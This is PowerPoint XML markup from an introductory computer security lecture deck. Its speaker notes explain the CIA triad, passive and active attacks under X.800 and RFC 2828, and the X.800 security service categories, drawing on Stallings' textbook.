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9" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId41"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId42"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="285" r:id="rId2"/>
    <p:sldId id="286" r:id="rId3"/>
    <p:sldId id="290" r:id="rId4"/>
    <p:sldId id="287" r:id="rId5"/>
    <p:sldId id="299" r:id="rId6"/>
    <p:sldId id="288" r:id="rId7"/>
    <p:sldId id="296" r:id="rId8"/>
    <p:sldId id="310" r:id="rId9"/>
    <p:sldId id="311" r:id="rId10"/>
    <p:sldId id="313" r:id="rId11"/>
    <p:sldId id="312" r:id="rId12"/>
    <p:sldId id="289" r:id="rId13"/>
    <p:sldId id="307" r:id="rId14"/>
    <p:sldId id="308" r:id="rId15"/>
    <p:sldId id="309" r:id="rId16"/>
    <p:sldId id="297" r:id="rId17"/>
    <p:sldId id="298" r:id="rId18"/>
    <p:sldId id="301" r:id="rId19"/>
    <p:sldId id="302" r:id="rId20"/>
    <p:sldId id="303" r:id="rId21"/>
    <p:sldId id="304" r:id="rId22"/>
    <p:sldId id="305" r:id="rId23"/>
    <p:sldId id="306" r:id="rId24"/>
    <p:sldId id="294" r:id="rId25"/>
    <p:sldId id="292" r:id="rId26"/>
    <p:sldId id="293" r:id="rId27"/>
    <p:sldId id="256" r:id="rId28"/>
    <p:sldId id="278" r:id="rId29"/>
    <p:sldId id="279" r:id="rId30"/>
    <p:sldId id="257" r:id="rId31"/>
    <p:sldId id="280" r:id="rId32"/>
    <p:sldId id="282" r:id="rId33"/>
    <p:sldId id="283" r:id="rId34"/>
    <p:sldId id="284" r:id="rId35"/>
    <p:sldId id="266" r:id="rId36"/>
    <p:sldId id="265" r:id="rId37"/>
    <p:sldId id="271" r:id="rId38"/>
    <p:sldId id="273" r:id="rId39"/>
    <p:sldId id="274" r:id="rId40"/>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5" autoAdjust="0"/>
    <p:restoredTop sz="83595" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="66" d="100"/>
          <a:sy n="66" d="100"/>
        </p:scale>
        <p:origin x="792"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smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>D</a:t>
          </a:r>
          <a:endParaRPr lang="it-IT" dirty="0">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="50000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:endParaRP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smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>L</a:t>
          </a:r>
          <a:endParaRPr lang="it-IT" dirty="0">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="50000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:endParaRP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smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t> €€€€</a:t>
          </a:r>
          <a:endParaRPr lang="it-IT" dirty="0">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="50000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:endParaRP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smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>S</a:t>
          </a:r>
          <a:endParaRPr lang="it-IT" dirty="0">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="50000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:endParaRP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smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t> €€</a:t>
          </a:r>
          <a:endParaRPr lang="it-IT" dirty="0">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="50000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:endParaRP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t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="it-IT"/>
        </a:p>
      </dgm:t>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t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="it-IT"/>
        </a:p>
      </dgm:t>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t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="it-IT"/>
        </a:p>
      </dgm:t>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t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="it-IT"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C0C7779E-00BD-42F8-B5FE-DA9D7409C6FE}" type="pres">
      <dgm:prSet presAssocID="{908AF930-87BE-4549-A766-553372BDEF52}" presName="right_12_1" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="it-IT"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A33A195F-8537-4D2A-8340-010E7CB586D1}" type="pres">
      <dgm:prSet presAssocID="{908AF930-87BE-4549-A766-553372BDEF52}" presName="right_12_2" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="it-IT"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CE4DA90B-3B93-4AE9-A1B7-B65B24172BC0}" type="pres">
      <dgm:prSet presAssocID="{908AF930-87BE-4549-A766-553372BDEF52}" presName="left_12_1" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="it-IT"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{F7AF4D0C-5FD6-4647-A776-419BC7008F4B}" srcId="{A77AC49E-EB8F-4B71-8855-B16C830D1F21}" destId="{0C1A543F-9269-4F76-A3F0-F264EBAC1135}" srcOrd="1" destOrd="0" parTransId="{E503FA15-A7E9-4CF9-BBF5-B47FF5C4E2C7}" sibTransId="{ACE43323-D7F5-45B9-9E84-F6E0D4744B1D}"/>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EAE8AF9E-E9DA-4F71-93A2-A724F8E5C812}" srcId="{A77AC49E-EB8F-4B71-8855-B16C830D1F21}" destId="{5FB79C3D-F9D4-450B-87F3-822578F8AEE8}" srcOrd="0" destOrd="0" parTransId="{05F13A74-5197-491E-93DA-7811F9AED929}" sibTransId="{DE70D980-A477-4596-9E5D-9F489DDC7405}"/>
    <dgm:cxn modelId="{F3511D1B-21CC-4481-833E-DF29FD23B610}" srcId="{908AF930-87BE-4549-A766-553372BDEF52}" destId="{A77AC49E-EB8F-4B71-8855-B16C830D1F21}" srcOrd="1" destOrd="0" parTransId="{5CD885BF-C92D-4D4B-BF22-B0F2CAF97A4F}" sibTransId="{3497FD02-0031-40F9-9D6B-B343F0045069}"/>
    <dgm:cxn modelId="{77A8F13C-3B25-4AC9-B784-4FE929093849}" type="presOf" srcId="{A77AC49E-EB8F-4B71-8855-B16C830D1F21}" destId="{083DDE85-50BE-4C4A-87DF-5B54883598D7}"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3475F9AF-F1AC-4F1D-A715-28CF6C1FEA73}" type="presOf" srcId="{5FB79C3D-F9D4-450B-87F3-822578F8AEE8}" destId="{C0C7779E-00BD-42F8-B5FE-DA9D7409C6FE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/balance1"/>
    <dgm:cxn modelId="{508B141D-1A14-4017-AC0E-EDDDEBCF05FD}" type="presOf" srcId="{908AF930-87BE-4549-A766-553372BDEF52}" destId="{DDD434EF-23AB-4572-B49F-27AC12574D8A}"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it-IT" sz="2000" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t> €€</a:t>
          </a:r>
          <a:endParaRPr lang="it-IT" sz="2000" kern="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="50000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:endParaRP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it-IT" sz="2000" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t> €€€€</a:t>
          </a:r>
          <a:endParaRPr lang="it-IT" sz="2000" kern="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="50000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:endParaRP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it-IT" sz="2700" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>D</a:t>
          </a:r>
          <a:endParaRPr lang="it-IT" sz="2700" kern="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="50000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:endParaRP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it-IT" sz="2700" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>S</a:t>
          </a:r>
          <a:endParaRPr lang="it-IT" sz="2700" kern="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="50000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:endParaRP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it-IT" sz="2700" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>L</a:t>
          </a:r>
          <a:endParaRPr lang="it-IT" sz="2700" kern="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="50000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:endParaRP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‹N›</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‹N›</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mtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>These three concepts form what is often referred to as the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" b="1" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CIA triad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="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smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>• </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" b="1" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Confidentiality</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="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smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>• </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" b="1" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Integrity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (covers both data and system integrity)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" b="1" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="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smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>• </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" b="1" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Availability:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="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smtClean="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smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>• </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" b="1" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Authenticity:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="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smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>• </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" b="1" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Accountability:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="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smtClean="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13</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14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35843" name="Rectangle 1026"/>
          <p:cNvSpPr>
            <a:spLocks noRot="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>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This quote from the start of Ch0 ”Reader’s Guide” sets the scene for why we want to study these issues.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="it-IT" smtClean="0">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15</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16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39939" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noRo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A useful means of classifying security attacks, used both in X.800 and RFC 2828, is in terms of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" i="1" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>passive attacks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" i="1" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>active attacks. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0">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smtClean="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" i="1" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Passive attacks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0">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smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0">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smtClean="0">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smtClean="0">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17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41987" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noRo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smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> masquerade of one entity as some other</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" altLang="it-IT" smtClean="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0">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smtClean="0">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smtClean="0">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smtClean="0">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EA68D8B-3865-4EEB-AA24-85207C6C6839}" type="slidenum">
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44035" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noRo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Consider the role of a security service, and what may be required. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Note both similarities and differences with traditional paper documents, which for example: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" i="1" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>have signatures &amp; dates; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> need protection from disclosure, tampering, or destruction; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> may be notarized or witnessed; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> may be recorded or licensed</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="it-IT" i="1" smtClean="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="it-IT"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999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7C1013A-BAF7-4076-921B-B3AA5EA975DF}" type="slidenum">
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46083" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noRo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This list is taken from Stallings Table 1.2 which provides details of the 5 Security Service categories and the 14 specific services given in X.800.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>This list includes the various "classic" security services which are traditionally discussed.  Note there is a degree of ambiguity as to the meaning of these terms, and overlap in their use. The broad service categories are:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" b="1" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>authentication </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>is concerned with assuring that a communication is authentic. Two specific authentication services are defined in X.800: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" b="1" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Peer entity authentication: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>provides corroboration of the identity of a peer entity in an association; and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" b="1" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Data origin authentication: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>provides corroboration of the source of a data unit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" b="1" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>access control </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>is the ability to limit and control the access to host systems and applications via communications links.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" b="1" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>confidentiality </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>is the protection of transmitted data from passive attacks, and the protection of traffic flow from analysis.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" b="1" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>integrity </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
